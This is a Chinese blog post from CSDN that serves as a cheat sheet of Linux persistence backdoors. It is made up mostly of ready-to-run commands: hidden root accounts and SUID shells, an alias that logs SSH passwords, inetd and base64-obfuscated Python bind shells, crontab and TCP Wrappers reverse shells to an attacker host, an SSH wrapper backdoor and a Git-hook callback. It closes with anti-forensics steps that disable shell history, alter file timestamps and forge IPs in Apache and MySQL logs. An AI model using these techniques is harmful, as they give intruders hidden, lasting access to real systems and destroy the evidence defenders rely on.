linux持久化

最新推荐文章于 2024-02-19 08:00:00 发布
最新推荐文章于 2024-02-19 08:00:00 发布
阅读量1.3k 收藏 2
点赞数
分类专栏: web 内网 文章标签: linux ssh 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54515836/article/details/119921829
版权
web 同时被 2 个专栏收录
25 篇文章 4 订阅
订阅专栏
内网
10 篇文章 1 订阅
订阅专栏

linux持久化后门

添加超级用户

echo "user:x:0:0::/:/bin/sh" >> /etc/passwd

使用命令查看用户

cat etc/passwd

如果系统不允许uid=0的用户远程登录,可以增加一个普通用户账号

echo "user::-1:-1:-1:-1:-1:-1:500" >> /etc/shadow

SUID shell

Suid shell是一种可用于以拥有者权限运行的shell,如果拥有者是root
那么任何运行了这个shell的用户便可以控制整个系统,如增加用户、修改root口令、清除日志等等。

root权限下执行

cp /bin/bash  /.test
chmod 4755 /.test

这个放的目录要尽可能隐蔽,最好是子子子目录然后找一个相似的命名。

切换普通用户

/.test

不过bash2针对suid做了一些措施 加个参数就行

/.test -p

alias 后门

当前用户目录下.bashrc

alias ssh='strace -o /tmp/sshpwd-`date '+%d%h%m%s'`.log -e read,write,connect -s2048 ssh'

inetd

修改/etc/inetd.conf

laytime stream tcp nowait root /bin/bash bash -i

然后nc直接连接就好

nc -vv 49.235.xx.xx

还可以配合修改/etc/service 改为常用端口隐藏

laytime  8081/tcp #backdoor

crontab后门

redis未授权访问也是利用这个,我们可以设置每隔一段时间反弹一次shell

(crontab -l;printf "*/60 * * * * exec 9<> /dev/tcp/127.0.0.1/8888;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i;\rno crontab for `whoami`%100c\n")|crontab -

分析

echo '*/60 * * * *'

crontab格式 每隔60分钟执行一次

exec 9<>/dev/tcp/127.0.0.1/8888

以读写方式打开/dev/tcp,并指定服务器名为:127.0.0.1(攻击机) 端口号为:8888,指定描述符为9

要注意的是:/dev/tcp本身是不存在的,在/dev目录下是找不到的

exec 0<&9;exec 1>&9 2>&1;

linux 三个基本文件描述符 0:stdin 1:stdout 2:stderr

n >&m 表示使文件描述符n成为描述符m的副本

exec 0<&9;   将fd9从定向到标准输入;

exec 1>&9 2>&1;   将标准输出从定向到文件fd9,将标准错误从定向到标准输出.

简单的理解为fd9=fd0 fd1=fd9 所以我的理解是,fd9从标准输入读入字符,处理后结果用标准输出输出.

/bin/bash --noprofile -i

打开一个shell

ssh公钥免密

ssh-keygen -t rsa

把自己本地生成的公钥id_rsa.pub传到目标服务器

chmod 600 ~/.ssh/authorized_keys

chmod 700 ~/.ssh

ssh软连接

ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=5555;

直接ssh连接5555端口就行,密码随便输入。但是有些限制了root不许远程登录不能指定root用户

SSH wrapper后门

cd /usr/sbin/
mv sshd ../bin/
echo '#!/usr/bin/perl' >sshd
echo 'exec "/bin/sh" if(getpeername(STDIN) =~ /^..4A/);' >>sshd
echo 'exec{"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd
chmod u+x sshd
/etc/init.d/sshd restart

连接

socat STDIO TCP4:target_ip:22,sourceport=13377

PAM

https://github.com/litsand/shell/blob/master/pam.sh

隐身登录

隐身登录系统,不会被last who w等指令检测到

ssh -T username@host /bin/bash -i
ssh -o UserKnownHostsFile=/dev/null -T user@host 
/bin/bash -if

隐藏文件

方法一
比如创建一个名字开头带 . 的 Webshell 或者文件夹,默认情况下是不会显示出来的,浏览器访问的时候加点访问就行。(查看方法:ls -a)

touch .webshell.php 创建名字为 .webshell.php 的文件
mkdir .backdoor/ 创建名字为 .backdoor 的文件夹

终极方法
在管理员喝多了或者脑子转不过来的情况下,是绝对不会发现的!至少我用了这么久是没几个发现的。
是文件的话浏览器访问直接输 … 就行,目录同理。

touch … 创建名字为 … 的文件
mkdir … 创建名字为 … 的文件夹

Git hooks

echo "xterm -display <attacker IP>:1 &" > .git/hooks/pre-commit
chmod +x .git/hooks/pre-commit
Xnest:1

当更新git的时候会触发:

git commit -am "Test"

PROMPT_COMMAND后门

bash提供了一个环境变量PROMPT_COMMAND,这个变量会在你执行命令前执行一遍。

一般运维人员都将用来记录每个用户执行命令的时间ip等信息。
每执行一个命令之前都会调用这个变量将你操作的命令记录下来。

export PROMPT_COMMAND='{ date "+[ %Y%m%d %H:%M:%S `whoami` ] `history 1 | { read x cmd; echo "$cmd      from ip:$SSH_CLIENT   $SSH_TTY"; }`"; }&gt;&gt; /home/pu/login.log'

使用

export PROMPT_COMMAND="lsof -i:1025 &>/dev/null || (python -c "exec('aW1wb3J0IHNvY2tldCxvcyxzeXMKcz1zb2NrZXQuc29ja2V0KCkKcy5iaW5kKCgiIiwxMDI1KSkKcy5saXN0ZW4oMSkKKGMsYSk9cy5hY2NlcHQoKQp3aGlsZSAxOgogZD1jLnJlY3YoNTEyKQogaWYgJ2V4aXQnIGluIGQ6CiAgcy5jbG9zZSgpCiAgc3lzLmV4aXQoMCkKIHI9b3MucG9wZW4oZCkucmVhZCgpCiBjLnNlbmQocikK'.decode('base64'))" 2>/dev/null &)"

解密

import socket,os,sys 
s=socket.socket() 
s.bind(("",1025)) 
s.listen(1) 
(c,a)=s.accept() 
while 1: 
	d=c.recv(512) 
	if 'exit' in d:  
		s.close()  
		sys.exit(0) 
	r=os.popen(d).read() 
	c.send(r)

python socks监听命令

NC连接

nc 192.168.1.174 1025

PROMPT_COMMAND提权

这个要求管理员有su的习惯,我们可以通过它来添加一个id=0的用户

export PROMPT_COMMAND="/usr/sbin/useradd -o -u 0 hack &>/dev/null && echo hacker:123456 | /usr/sbin/chpasswd &>/dev/null && unset PROMPT_COMMAND"

除此之外可以利用script记录某人行为:
基本用法:

script -t 2>demo.time -a demo.his 记录保存为录像
scriptreplay demo.time demo.his 播放记录

用户家目录下,修改环境变量,使得用户登录就会触发录像

vi ~/.profile
script -t -f -q 2>/wow/$USER-$UID-`date +%Y%m%d%H%M%S`.time -a /wow/$USER-$UID-`date +%Y%m%d%H%M%S`.his

Sudoers “trick”

其实Sudoers并不算后门,是一个Linux用户控制权限
通过root权限改写对普通用户可执行root命令

sudo su -c "echo 'user ALL = NOPASSWD: ALL' >> /etc/sudoers.d/README"

https://segmentfault.com/a/1190000007394449

TCP Wrappers

TCP_Wrappers是一个工作在应用层的安全工具,它只能针对某些具体的应用或者服务起到一定的防护作用。比如说ssh、telnet、FTP等服务的请求,都会先受到TCP_Wrappers的拦截。

TCP_Wrappers有一个TCP的守护进程叫作tcpd。以telnet为例,每当有telnet的连接请求时,tcpd即会截获请求,先读取系统管理员所设置的访问控制文件,合乎要求,则会把这次连接原封不动的转给真正的telnet进程,由telnet完成后续工作;如果这次连接发起的ip不符合访问控制文件中的设置,则会中断连接请求,拒绝提供telnet服务。

ALL: ALL: spawn (bash -c "/bin/bash -i >& /dev/tcp/<Attack IP>/443 0>&1") & :allow

ssh访问目标主机ssh qweqwe@192.168.4.100触发后门

进程注入

cymothoa进程注入后门

./cymothoa -p 1014 -s 0 -y 8888

https://github.com/jorik041/cymothoa

其他一些小技巧

bash去掉history记录

export HISTSIZE=0
export HISTFILE=/dev/null

修改上传文件时间戳

touch -r 老文件时间戳 新文件时间戳

伪造Apache日志中的指定IP

sed –i ‘s/192.168.1.3/192.168.1.4/g’ /var/log/apache/ access.log
sed –i ‘s/192.168.1.3/192.168.1.4/g’ /var/log/apache/error_log

Linux日志清除

首先是Apache日志,Apache主要的日志就是access.log``error_log,前者记录了HTTTP的访问记录,后者记录了服务器的错误日志。根据Linux的配置不同和Apache的版本的不同,文件的放置位置也是不同的,不过这些都可以在httpd.conf中找到。

对于明文的Apache文件,通过正则表达式就可以搞定:
sed –i 's/192.168.1.3/192.168.1.4/g' /var/log/apache/ access.logsed –i 's/192.168.1.3/192.168.1.4/g' /var/log/apache/error_log
其中192.168.1.3是我们的IP,192.168.1.4使我们伪造的IP。
在正则表达式中有特殊的含义,所以需要用“”来进行转义。

MySQL日志文件
log-error=/var/log/mysql/mysql_error.log #错误日志
log=/var/log/mysql/mysql.log#最好注释掉,会产生大量的日志,包括每一个执行的sql及环境变量的改变等等
log-bin=/var/log/mysql/mysql_bin.log # 用于备份恢复,或主从复制.这里不涉及。
log-slow-queries=/var/log/mysql/mysql_slow.log #慢查询日志
log-error=/var/log/mysql/mysqld.log
pid-file=/var/run/mysqld/mysqld.pid

sed –i 's/192.168.1.3/192.168.1.4/g'/var/log/mysql/mysql_slow.log

至于二进制日志文件,需要登录mysql client来修改删除,建议这种操作最先执行。

php日志修改
sed –i 's/192.168.1.3/192.168.1.4/g'/var/log/apache/php_error.log
最后就是Linux的日志文件了,这个比较多,记录的也比较复杂,我的环境是CentOS 6.3。我现在只把和渗透有关的文件列出来,主要在/etc/logrotate.d/syslog

/var/log/maillog,该日志文件记录了每一个发送到系统或从系统发出的电子邮件的活动,它可以用来查看用户使用哪个系统发送工具或把数据发送到哪个系统

var/log/messages,该文件的格式是每一行包含日期、主机名、程序名,后面是包含PID或内核标识的方括号,一个冒号和一个空格

/var/log/wtmp,该日志文件永久记录每个用户登录、注销及系统的启动,停机的事件。该日志文件可以用来查看用户的登录记录,last命令就通过访问这个文件获得这些信息,并以反序从后向前显示用户的登录记录,last也能根据用户,终端tty或时间显示相应的记录

/var/run/utmp,该日志文件记录有关当前登录的每个用户的信息,因此这个文件会随着用户登录和注销系统而不断变化,它只保留当时联机的用户记录,不会为用户保留永久的记录。系统中需要查询当前用户状态的程序,如who、w、users、finger等就需要访问这个文件

/var/log/xferlog,该日志文件记录FTP会话,可以显示出用户向FTP服务器或从服务器拷贝了什么文件。该文件会显示用户拷贝到服务器上的用来入侵服务器的恶意程序,以及该用户拷贝了哪些文件供他使用。

bash_history,这是bash终端的命令记录,能够记录1000条最近执行过的命令(具体多少条可以配置),通过这个文件可以分析此前执行的命令来知道知否有入侵者,每一个用户的home目录里都有这么一个文件

清除脚本:
https://github.com/JonGates/jon

参考文章:

我所了解的渗透测试——Linux后门类型 - 安全客,安全资讯平台 (anquanke.com)

https://www.slideshare.net/ulissescastro/50-ton-of-backdoors?from_action=save

HoAd's blog
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
6.5. 持久化 - Linux
Sumarua的博客
07-07 1073
文章目录6.5. 持久化 - Linux6.5.1. 权限提升6.5.2. 自启动6.5.3. 后门 6.5. 持久化 - Linux 6.5.1. 权限提升 内核漏洞利用 攻击有root权限的服务 利用第三方服务提权 通过有SUID属性的可执行文件 查找可能提权的可执行文件 find / -perm +4000 -ls find / -perm -u=s -type f 2>/dev/null find / -user root -perm -4000 -print 2>/dev/null
Linux持续化后门
小晓晓晓林的博客
02-20 3305
Linux权限维持 环境:Centos7、Kali虚拟机等 1、增加超级用户 useradd -p `openssl passwd -1 -salt 'salt' 123456` test -o -u 0 -g root -G root -s /bin/bash -d /home/test 通过命令创建了test 123456的超级用户 2、unix bash远...
持久化:利用Linux PAM创建后门
最新发布
qq_68163788的博客
02-19 1431
PAM(Pluggable Authentication Modules)是Linux系统中用于身份验证的模块化框架。通过利用PAM,可以创建一个后门来绕过系统的认证机制,从而获得未经授权的访问权限。 要创建一个后门,首先需要编写一个自定义的PAM模块,该模块可以在用户登录时执行特定的操作,例如绕过密码验证或者添加一个额外的认证方式。接着,将这个自定义的PAM模块加载到系统中,并配置PAM以在用户登录时使用该模块。 通过这种方式,攻击者可以在系统中创建一个隐藏的后门,同时绕过正常的认证流程,
持久化Linux利用SUID、任务计划、vim进行权限维持
qq_68163788的博客
02-17 1152
以利用SUID(Set User ID)权限来实现权限维持。通过设置SUID权限,用户可以以文件所有者的身份执行该文件,从而获取文件所有者的权限。这样可以帮助攻击者在系统中保持持久权限。另外,任务计划(Cron Jobs)也是一种常见的权限维持方法。攻击者可以通过创建定时任务,定期执行恶意脚本或程序来维持权限。此外,vim编辑器也可以被用来进行权限维持。攻击者可以利用vim编辑器的漏洞来提升自己的权限或执行恶意代码。
linux Redis 持久化概念 | AOF持久化 | RDB持久化 | 性能管理 | 超详细
m0_75015568的博客
03-31 362
linux Redis 持久化概念 | AOF持久化 | RDB持久化 | 性能管理 | 超详细
Linux常见的持久化后门汇总1
08-03
总结来说,这些Linux持久化后门技术各有优缺点,但共同的目标都是在攻击者不直接拥有物理访问权限的情况下,保持对系统的长期控制。为了防御这些威胁,系统管理员应定期检查系统日志、监控网络流量、更新安全补丁,...
Linux-OK.rar_linux 格式化
09-20
5. **持久化挂载**:为了在每次系统启动时自动挂载分区,可以在/etc/fstab文件中添加一行条目,指定分区设备名、挂载点、文件系统类型、挂载选项和dump/FSCK检查顺序。 6. **注意事项**:在进行磁盘分区和格式化...
linper:Linux持久性工具包
03-07
linux持久性工具包 档案 对策/-加强/监控通用持久性机制的方法 powershell /-最终赢家的占位符 CONTRIBUTE.md-有关对此项目做出贡献的说明 README.md-是否 TODO.md-计划的修复和增强功能 linper.sh-执行我 特征 枚举...
Linux下redis的持久化、主从同步与哨兵详解
01-20
1.0 redis持久化 Redis是一种内存型数据库,一旦服务器进程退出,数据库的数据就会丢失,为了解决这个问题,Redis提供了两种持久化的方案,将内存中的数据保存到磁盘中,避免数据的丢失。 1|1RDB持久化 redis提供...
Redis之持久化实操(Linux版)
qq_53267860的博客
06-30 1135
注:”RDB自动启动方式:与“bgsave”一样,在此省略 10.3服务器运行过程中关闭服务器时指定保存数据 11.RDB优缺点 12.AOF介绍 13.AOF写数据原理 以下两个演示是视频截屏:
Linux环境下持久化和集群部署nacos
小白的进化路
10-09 182
持久化 在nacos目录下的conf里面,有一个nacos-mysql.sql文件,在mysql上的数据库执行,会在mysql数据库中生成nacos相关的表。 在nacos/conf下,有一个application.properties文件,在文件末尾配置数据库的连接信息 spring.datasource.platform=mysql db.num=1 db.url.0=jdbc:mysql://127.0.0.1:3306/nacos_config?characterEncoding=utf8&
linux 持久化后门
luguifang2011的专栏
01-18 3120
前言 收集复现下网上linux后门姿势,一起学习下。 这张图特别好 添加超级用户 某些情况下是没有回显的,可以用一句话直接添加用户 1、useradd guest;echo 'guest:123456'|chpasswd 2、useradd -p `openssl passwd 123456` guest 3、useradd -p "$(openssl passwd 12...
TinyCoreLinux持久化问题
大数据技术杂谈
09-18 4041
因为TinyCoreLinux是内存闪存系统,为保证系统的快速启动运行,所有数据都保存在内存中,所以当重启系统之后对系统的所有修改将被删除。因此需要指定一个tce目录,这样就会自动保存home和opt目录。默认情况下,关机的时候会调用backup utility保存你的文档和设置。backup utility会创建一个包含home和opt目录的压缩文档mydata.tgz。mydata.tgz保存
Linux 修改系统时区并持久化
专注数据库、大数据领域干货分享,用严谨的数据技术广交天下朋友。
02-19 302
最简单的操作方法就是直接 COPY TimeZone 文件,然后固化到 BIOS,具体操作如下。在虚拟机环境下,Mac 的 VMWare 是有效的,但是在 Parallel Desktop 下会出现设置后过一段时间又恢复为原时区的问题,估计这个现象与宿主机的时区有关。
Linux 持久化之AOF操作【redis】
qq_46489085的博客
12-05 1267
前言✍ 可以先看往期的 【RDB????】 快照功能(RDB)并不是非常耐久(durable): 如果 Redis 因为某些原因而造成故障停机, 那么服务器将丢失最近写入、以及未保存到快照中的那些数据。 从 1.1 版本开始, Redis 增加了一种完全耐久的持久化方式: AOF 持久化。 什么是AOF 如果要使用AOF,需要修改配置文件: appendonly no yes则表示启用AOF 默认是不开启的,我们需要手动配置,然后重启redis,就可以生效了! 将我们的命令都记录下来,hist
Linux挂载持久化内存(PMEM)
zyfzyfzyfaaa的博客
04-15 2585
挂载持久化内存(PMEM) 1. 安装虚拟机(桥接网络模式) 选择[典型(推荐)],进入下一步 选择稍后安装操作,下一步 选择[客户机操作系统——Linux,版本为CentOS 7 64位],下一步 虚拟机命名,下一步 [最大磁盘大小——60G,将虚拟磁盘拆分为多个文件](注意,若做内核实验,磁盘大小不易太小) [自定义硬件] [内存——4GB] [处理器数量——2,内核数量——2],勾选【虚拟化Intel VT-x/EPT 或 AMD-V/RVI】 使用
持久化后门crontab
黄都伟
07-06 805
服务器遇到了挖矿程序,wget --quiet http://m247.ltd:36663/.xmrig/0 -O- crontab计划任务导致了该告警的产生。crontab是Linux操作系统中常用的计划任务服务,黑客或恶意程序常常会通过添加修改cron任务使恶意程序定时重复启动,保持驻留。 1.vim /etc/crontab 找到这条命令删除并保存。 2.使用crontab -l 查看,crontab -e进入编辑页面,输入dd,删除, :wq! 保存退出 ...
12.3、后渗透测试--持久化后门
无痕的博客
12-13 2282
metasploit后渗透测试--持久化后门
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

HoAd's blog

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值